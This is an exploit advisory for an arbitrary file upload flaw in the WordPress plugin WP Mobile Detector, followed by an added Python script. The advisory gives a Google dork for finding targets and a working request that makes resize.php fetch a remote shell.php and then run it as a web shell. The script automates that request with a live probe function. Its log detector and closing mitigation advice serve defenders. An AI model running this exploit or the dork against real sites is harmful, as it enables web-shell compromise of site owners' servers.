# Exploit Title: WP Mobile Detector <= 3.5 Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/wp-mobile-detector
# Date: 01-06-2016
# Exploit Author: Aaditya Purani
# Author Details: https://aadityapurani.com
# Vendor: https://wordpress.org/plugins/wp-mobile-detector/changelog
# Version: 3.5
# Tested on: Kali Linux 2.0 Sana / Windows 10
This vulnerability was disclosed to the public yesterday: WP Mobile Detector <= 3.5
contains an arbitrary file upload through which an attacker can upload malicious
PHP files (a web shell) to the website. Over 10,000 installs are affected. The
vendor has released a patch in versions 3.6 and 3.7, see
https://wordpress.org/plugins/wp-mobile-detector/changelog/.
I have written a complete PoC post:
WP Mobile Detector Vulnerability <=3.5 Exploit POC
I have made a PoC video here:
https://www.youtube.com/watch?v=ULE1AVWfHTU
Simple PoC:
Go to:
    [wordpress site path]/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]
resize.php fetches the remote file and saves it in the plugin's cache directory:
    /wp-content/plugins/wp-mobile-detector/cache/shell.php
Requesting that path then executes the uploaded shell.
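The following Python script is an added example written for this page, not the author's PoC code and not part of the plugin. It builds the resize.php request described above, predicts where the fetched file lands (assuming the plugin keeps the basename of src as the cache filename, as the PoC path suggests), and flags the same requests in an Apache/nginx-style access log so a defender can spot attempts and successful drops. The function names, the placeholder site, and the sample log lines are all my own constructions.

```python
# Added example (not the advisory author's code): exercise the resize.php
# vector from the PoC above and detect it in web server logs.
# Endpoint paths are taken from the advisory; everything else is assumed.
import posixpath
import re
import urllib.error
import urllib.request
from urllib.parse import parse_qs, quote, urljoin, urlsplit

PLUGIN_DIR = "wp-content/plugins/wp-mobile-detector/"
RESIZE_ENDPOINT = PLUGIN_DIR + "resize.php"
CACHE_DIR = PLUGIN_DIR + "cache/"


def exploit_url(site, payload_url):
    """resize.php?src=<payload_url>, exactly the request in the PoC."""
    base = site.rstrip("/") + "/"
    return urljoin(base, RESIZE_ENDPOINT) + "?src=" + quote(payload_url, safe="")


def dropped_file_url(site, payload_url):
    """Where the advisory says the fetched file is written: cache/<basename>.
    Assumption: the plugin reuses the basename of src as the cache filename."""
    base = site.rstrip("/") + "/"
    name = posixpath.basename(urlsplit(payload_url).path)
    return urljoin(base, CACHE_DIR) + name


def probe(site, payload_url, timeout=10):
    """Live check (network I/O, authorised testing only): trigger the fetch,
    then report whether the dropped file answers. Not used by the offline
    log helpers below."""
    try:
        urllib.request.urlopen(exploit_url(site, payload_url), timeout=timeout).read()
        with urllib.request.urlopen(dropped_file_url(site, payload_url), timeout=timeout) as r:
            return r.status == 200
    except urllib.error.HTTPError:
        return False


# Request line of a "combined" style access log: "GET /path?x=y HTTP/1.1" 200
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def classify_request(log_line):
    """Return a reason string if the line looks like abuse of this plugin, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    if target.path.endswith("/" + RESIZE_ENDPOINT):
        src = parse_qs(target.query).get("src", [""])[0]
        s = urlsplit(src)
        if s.scheme in ("http", "https", "ftp") and s.netloc:
            # resize.php asked to fetch a remote resource: the vector itself
            return "remote-src"
        return None
    if ("/" + CACHE_DIR) in target.path and target.path.lower().endswith(".php"):
        # PHP served out of the plugin cache dir: a dropped shell being used
        return "php-in-cache"
    return None


def scan_log(lines):
    """(line index, reason) for every suspicious line, in log order."""
    hits = []
    for i, line in enumerate(lines):
        reason = classify_request(line)
        if reason:
            hits.append((i, reason))
    return hits


# Constructed sample log: an attack (fetch, then shell use) plus benign traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jun/2016:10:00:01 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http%3A%2F%2F198.51.100.7%2Fshell.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jun/2016:10:00:02 +0000] "GET /wp-content/plugins/wp-mobile-detector/cache/shell.php HTTP/1.1" 200 1234',
    '198.51.100.9 - - [01/Jun/2016:10:00:03 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=/wp-content/uploads/2016/05/logo.png HTTP/1.1" 200 9000',
    '198.51.100.9 - - [01/Jun/2016:10:00:04 +0000] "GET /?p=1 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    site = "https://example.com"  # placeholder target, assumed
    print(exploit_url(site, "http://198.51.100.7/shell.php"))
    print(dropped_file_url(site, "http://198.51.100.7/shell.php"))
    for i, reason in scan_log(SAMPLE_LOG):
        print(f"line {i}: {reason}: {SAMPLE_LOG[i]}")
```

The detector treats any remote src handed to resize.php as suspicious, not only ones ending in .php, because the filename is attacker controlled and the page's PoC only needs the server to fetch and store whatever it is given. Independently of the vendor's patch, a defender can also deny PHP execution inside plugin cache directories at the web server, which turns a dropped shell.php into an inert file.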